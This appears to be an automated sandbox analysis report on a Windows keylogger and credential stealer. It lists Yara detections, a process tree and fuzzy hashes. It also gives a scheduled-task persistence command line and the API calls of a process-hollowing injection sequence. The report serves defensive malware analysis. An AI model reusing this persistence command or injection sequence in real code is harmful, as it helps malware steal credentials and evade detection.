Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs Detection: 44%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:03:03
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:03:09
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp"
Imagebase:	0xb80000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:03:09
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:03:09
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Imagebase:	0x50000
File size:	815'104 bytes
MD5 hash:	332593AE1E0BA5A06370963C37BBBCEB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:03:10
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Imagebase:	0x350000
File size:	815'104 bytes
MD5 hash:	332593AE1E0BA5A06370963C37BBBCEB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:03:10
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Imagebase:	0xeb0000
File size:	815'104 bytes
MD5 hash:	332593AE1E0BA5A06370963C37BBBCEB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.4122549015.0000000003307000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.4119575641.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	39
Total number of Limit Nodes:	2

Executed Functions

Function 0785E0C0 Relevance: 2.7, Strings: 2, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 0785E2E0
Te^q, xrefs: 0785E149

Memory Dump Source

Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: 9e7a8aab14c6c1d737cb1f1a0e700b4031d35a66b0dea5bf69b7e8660d44ab00
Instruction ID: a9a8a3dea4a6e45557200f36b7f592ca75398e418b42066d31ee967ef7fe7694
Opcode Fuzzy Hash: 9e7a8aab14c6c1d737cb1f1a0e700b4031d35a66b0dea5bf69b7e8660d44ab00
Instruction Fuzzy Hash: 2781C2B4E012198FDB08DFE9C9846EEBBF2BF89301F24852AD815AB354DB359905CF54

Function 0785E0E0 Relevance: 2.7, Strings: 2, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 0785E2E0
Te^q, xrefs: 0785E149

Memory Dump Source

Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: 5491e7101d41ce0c80bf416755934399e489791f8a24a067ce7e02526842816d
Instruction ID: 4352bb4ae2c492c5d64b61e5cbdfbe6302477a5e5ca6b870919c90b35a232b5f
Opcode Fuzzy Hash: 5491e7101d41ce0c80bf416755934399e489791f8a24a067ce7e02526842816d
Instruction Fuzzy Hash: 9581B3B4E102198FDB08CFE9C9846EEFBB2BF89301F14852AE815AB354DB355905CF54

Function 07640F28 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53e0d6f546ddbac3fc91e9576b195d21553bce8a71526bfa595a74b3db80fbd1
Instruction ID: 82a8a377b4fbc4a42ad40558359485b11caeb501767162664c058c6dbd20f010
Opcode Fuzzy Hash: 53e0d6f546ddbac3fc91e9576b195d21553bce8a71526bfa595a74b3db80fbd1
Instruction Fuzzy Hash: FAD13EB4D1021ADFCB44CF9AD4814AEFBB2FF8A300F54D569D916AB214D734A982CF94

Function 07640F17 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ba5e82742267f45ec138ba2c97a8f2762318df98384bdff0058efe1326c31c0
Instruction ID: 354c482aa082da49d55ea4fc781853ba0d8650ccf8d7dc8e5e6b8d53dc323ded
Opcode Fuzzy Hash: 1ba5e82742267f45ec138ba2c97a8f2762318df98384bdff0058efe1326c31c0
Instruction Fuzzy Hash: 1AD151B4D1021ACFCB44CFAAC4814AEFBB2FF89300F54D566D916A7254D7349982CF90

Function 076445F9 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a6eb1d6036bee732956d84252ff3d6bf8af608b420add1e078aa30c66224603
Instruction ID: 0b6cd5c3b522ef335f6414af83fedf8163857b0ef37c355544f699ad8b251eb8
Opcode Fuzzy Hash: 5a6eb1d6036bee732956d84252ff3d6bf8af608b420add1e078aa30c66224603
Instruction Fuzzy Hash: 3C81E5B5E1524ADFCB04CFA6D4819AEFBB2FB89310F14942AE416B7264DB349942CF40

Function 07644608 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54cba3f725971908d6b2f53458cf675f28a708eb92f2cc38752c7111f333b01c
Instruction ID: 342800630f484173ef6541d74cfd227817da466835387fd17a57fbe586cb7642
Opcode Fuzzy Hash: 54cba3f725971908d6b2f53458cf675f28a708eb92f2cc38752c7111f333b01c
Instruction Fuzzy Hash: C171C3B4D15249DFCB04CFEAD58199EFBB2FB89310F14942AE516BB264DB349942CF40

Function 076436C0 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5aee66efb52bf6e830fac11fba04ce71ba20103da0ace5b7cff00e7da85cfcb
Instruction ID: 89d9e559ae40f73f879bceac88d198e23d5dc56d3e4c2bb5e3c9d423a327aa80
Opcode Fuzzy Hash: a5aee66efb52bf6e830fac11fba04ce71ba20103da0ace5b7cff00e7da85cfcb
Instruction Fuzzy Hash: 525106B5E14209AFCB44CFA6D8455AEBBF2BB8A300F00952AE416F7354DB3859018F54

Function 076436D0 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32601768f41d1a7ea4ab823a76aa5f702282e537c5c36694866602c045740934
Instruction ID: f992ca3cfa85e427a2ab55e0084e611446211fc45734b935f660ba3d2e0c0244
Opcode Fuzzy Hash: 32601768f41d1a7ea4ab823a76aa5f702282e537c5c36694866602c045740934
Instruction Fuzzy Hash: 625106B5E14209AFCB48CFA6D9455AEFBF2FB8A310F10942AE416F7354DB3899018F54

Function 0764001E Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3da5c4da2703160655a1900f3cbcce2c4fbe29ab13ed41a2a2abe3190ed8712e
Instruction ID: 05b08760d9659e38994dc5023575bdb773b2e84687d221f427ac87c082d134f9
Opcode Fuzzy Hash: 3da5c4da2703160655a1900f3cbcce2c4fbe29ab13ed41a2a2abe3190ed8712e
Instruction Fuzzy Hash: E7312CB0E056588FDB59CFA6D8543DEBFB2AFC9310F14C0AAD405AB254DB740949CF50

Function 07640040 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 724e3463b709eebebdf700ac261dd524193d389b7fdbb3d59dbc706fbb463f1b
Instruction ID: e1addde1d9b8fadb706095413ea2ac30bb321fe020a146b966c6669b08bcb426
Opcode Fuzzy Hash: 724e3463b709eebebdf700ac261dd524193d389b7fdbb3d59dbc706fbb463f1b
Instruction Fuzzy Hash: F621F6B1E006188BEB58CFABD9443DEFBB2AFC8310F14C06AD909A6254DB751A46CF50

Function 07647908 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6375ddd479bc134832e3f85a4379dc4d050f47c3dbfa30663d10e322789cddde
Instruction ID: cd5ae2525871469287a44f7666dba246f6b2696f28e9639c2302a079e3a31309
Opcode Fuzzy Hash: 6375ddd479bc134832e3f85a4379dc4d050f47c3dbfa30663d10e322789cddde
Instruction Fuzzy Hash: CF21DAB1E056189FEB18CF67D94079EBBF3AFC9310F14D0BAD449A6254DB340A458F51

Function 07647918 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b9947b92a48ca3160ea78ffd8151294cc1ebb21eb944c2f494c95736b56fa70
Instruction ID: d491fa5f0a046824dfc90503a9361b3f058d3d688107f3547d81649aeaa25d1d
Opcode Fuzzy Hash: 4b9947b92a48ca3160ea78ffd8151294cc1ebb21eb944c2f494c95736b56fa70
Instruction Fuzzy Hash: C021C4B1E046189FEB18CF6BD84079EBAF7AFC9310F04D1BAD509A6264EB340A458F51

Function 0764EEC4 Relevance: 1.8, APIs: 1, Instructions: 251
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0764F106

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0a03220541d0459fe93b1a3e17b16866cc619c4a7f96373dcb55b7e2ae763046
Instruction ID: 8a66e36b98531dd547b816287ba2c136a716e2cee1002131d48395feef92bb19
Opcode Fuzzy Hash: 0a03220541d0459fe93b1a3e17b16866cc619c4a7f96373dcb55b7e2ae763046
Instruction Fuzzy Hash: BEA13BB1D0025ADFDB10CFA8C841BEDBBB2BF48314F188569E849E7250DB759985CF92

Function 0764EED0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0764F106

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3c2c3967e2f1c60ae8a8de35babf7565120546dbb02b58e5d5df038acd22710d
Instruction ID: ce93121feac31ad32cc4c758bb23584b58fb4f57ab81c29305f58b85d57621c9
Opcode Fuzzy Hash: 3c2c3967e2f1c60ae8a8de35babf7565120546dbb02b58e5d5df038acd22710d
Instruction Fuzzy Hash: 26915CB1D0025ADFDB10CFA8C841BDDBBF2BF48314F1881A9E849A7250DB759985CF92

Function 0764E560 Relevance: 1.6, APIs: 1, Instructions: 77
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 0764E62A

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 752bf3b4219e15b4de6a8a513f6ac2d21dde0184666b390d4c346b47182dada8
Instruction ID: dcfe26f692592be4f808106ab8fb08ada31b46cd0d26613552dc513c746cd615
Opcode Fuzzy Hash: 752bf3b4219e15b4de6a8a513f6ac2d21dde0184666b390d4c346b47182dada8
Instruction Fuzzy Hash: 92319AB19002899FCB10DFA9C4417DEFBF4EF89324F24805AD419A7250CB39A941CBA5

Function 0764EC41 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0764ECD8

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f834b21b1f46a4ff33a4675efdae1e18fea2eb074fbe6aa3f88733c6e2640eb9
Instruction ID: 989abd2c1dc27027391bfe270c8858383e4adbaa0aa8fa8d4b3c4e67281d4428
Opcode Fuzzy Hash: f834b21b1f46a4ff33a4675efdae1e18fea2eb074fbe6aa3f88733c6e2640eb9
Instruction Fuzzy Hash: 542135B19003599FCB10CFAAC985BDEBBF5FF48310F10842AE959A7250D779A944CFA4

Function 0764EC48 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0764ECD8

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 221179a317986368727d8de34703ce808ce2004776d2141b384e1431cff480cc
Instruction ID: 081bcd22fc74a21e89377efdc2400eae5ef1fac047b58c97339d6c7b337ba521
Opcode Fuzzy Hash: 221179a317986368727d8de34703ce808ce2004776d2141b384e1431cff480cc
Instruction Fuzzy Hash: 802126B19003599FCB10DFA9C985BDEBBF5FF48310F10842AE959A7250C7799944CFA4

Function 0764ED31 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0764EDB8

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f8e15132e12b194b8c5af032d316faefe78ace2412caecd1f79e44e521d72899
Instruction ID: 2a181b77f71052b46139fc955693bb3e10998e22eff267ef01d9725880b03458
Opcode Fuzzy Hash: f8e15132e12b194b8c5af032d316faefe78ace2412caecd1f79e44e521d72899
Instruction Fuzzy Hash: 1C2127B18002599FCB10DFAAC880ADEFBF5FF48310F14842AE959A7250D7399544CBA5

Function 0764E670 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0764E6F6

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 27042d581cec3cfd2eaafab0c237f923f2bb78a40715a1af89185f57f503b2cf
Instruction ID: c66618d5bbd8a9e7e956cc47e72ed2ac3697ce52b0edb7069390cae790fa2638
Opcode Fuzzy Hash: 27042d581cec3cfd2eaafab0c237f923f2bb78a40715a1af89185f57f503b2cf
Instruction Fuzzy Hash: 822139B19002198FDB10DFAAC5857EEBBF5BF48324F14842AD459B7290C7789544CFA5

Function 0764E678 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0764E6F6

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1c04415160e83c3f139f2668fb6fc8dea42c413fd0b5e2a72a217fb34c076fca
Instruction ID: 83c15bcdbc4bdfea5e0dc1c9fac049f0d4232203ff9793a4f4d8a3328c7047ec
Opcode Fuzzy Hash: 1c04415160e83c3f139f2668fb6fc8dea42c413fd0b5e2a72a217fb34c076fca
Instruction Fuzzy Hash: 212138B1D002099FDB10DFAAC4857EEBBF4FF48324F14842AD459A7240C7799944CFA5

Function 0764ED38 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0764EDB8

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: a486c60a8594855ff1e056b01353881161619a0e8a1ad8b8bf1bed81a71056e3
Instruction ID: 6f370bd4ba63a0c5732adc9304ed33a7ea79e0ea851129563fb63ebc9638ec69
Opcode Fuzzy Hash: a486c60a8594855ff1e056b01353881161619a0e8a1ad8b8bf1bed81a71056e3
Instruction Fuzzy Hash: F92128B1D002599FCF10DFAAC841AEEFBF5FF48310F14842AE559A7250C7799944CBA5

Function 0764EB80 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0764EBF6

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f57f1a95e7aa3cfcbe35fcf5a38f40a0c4d3918729b295d1ad4d4e10ff6e1fba
Instruction ID: 8b6f0d7fc916386b285cf3ee8ede0b0656ac8ebcf643eadd16b74f3ed693341b
Opcode Fuzzy Hash: f57f1a95e7aa3cfcbe35fcf5a38f40a0c4d3918729b295d1ad4d4e10ff6e1fba
Instruction Fuzzy Hash: 971189B29002499FCB20DFAAC805BDEBFF5EF48320F108419E915A7250C7759940CFA1

Function 0764EB88 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0764EBF6

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 85942755f6c0459725b45310f8c2958a0877daa42b6208eba52a4560c93cebde
Instruction ID: 4eb68582c00262985ba9f7b942b5c24f532b71ef945c0708368c721cee8970a1
Opcode Fuzzy Hash: 85942755f6c0459725b45310f8c2958a0877daa42b6208eba52a4560c93cebde
Instruction Fuzzy Hash: C81137B29002499FCB10DFAAC845BDEFFF5EF88320F148419E559A7250C775A944CFA5

Function 0764E5C2 Relevance: 1.6, APIs: 1, Instructions: 52
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 0764E62A

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 61a30cb306738dfbd31fe6c6a0d550f394c6b02d0147bba0aab5ca24454296bf
Instruction ID: 0b8501bf42d996b43198853cf411a5e7d0dc769dd8168d48538ec2a467540a48
Opcode Fuzzy Hash: 61a30cb306738dfbd31fe6c6a0d550f394c6b02d0147bba0aab5ca24454296bf
Instruction Fuzzy Hash: 4A1149B19002498FCB10DFAAD4457DEFBF4EF88324F24841AD459A7250CB75A544CBA5

Function 0764E5C8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0764E62A

Memory Dump Source

Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 25068a9cae6382714fe8560a9930c746b75481277af838b3efdd9607338a3eac
Instruction ID: 129fc478d234fc1bc3c587defc855dfc7a0672989686cda2c04fb45e966d1b2d
Opcode Fuzzy Hash: 25068a9cae6382714fe8560a9930c746b75481277af838b3efdd9607338a3eac
Instruction Fuzzy Hash: C5113AB1D002598FCB10DFAAC4457DEFBF4EF88324F24841AD459A7250C775A944CF95

Function 00AFBA60 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00AFBAC6

Memory Dump Source

Source File: 00000000.00000002.1724046659.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_af0000_3140, EUR.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 14a5a83b44a3858181c5bc6afd4e7fb36f622a1cf1d30858bf349a866036cb5f
Instruction ID: 972528b2d974d3921b00c14c49645e49eea44b6183f1951764fd848cce37ca1d
Opcode Fuzzy Hash: 14a5a83b44a3858181c5bc6afd4e7fb36f622a1cf1d30858bf349a866036cb5f
Instruction Fuzzy Hash: 10110FB6C002498FCB10DF9AD844ADEFBF4AB88320F14846AD558A7610C379A545CFA1

Function 07855AE8 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

@, xrefs: 07855CBF

Memory Dump Source

Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 5ff24802f6284604c3340f07c8d061feb6f862788adcc4e1296204c2c3a23a95
Instruction ID: b7507bd1bba13c4a236e67f44ae032941489c3ef343ba9c2ef3f32205b8b763b
Opcode Fuzzy Hash: 5ff24802f6284604c3340f07c8d061feb6f862788adcc4e1296204c2c3a23a95
Instruction Fuzzy Hash: C4D11C7591020ACFCF04CFA8C4949EDB7B1FF58325B218659D806B7259D734AE9ACF80

Function 07855AD9 Relevance: 1.4, Strings: 1, Instructions: 198COMMON

Download Yara Rule

Strings

, xrefs: 07855C8B

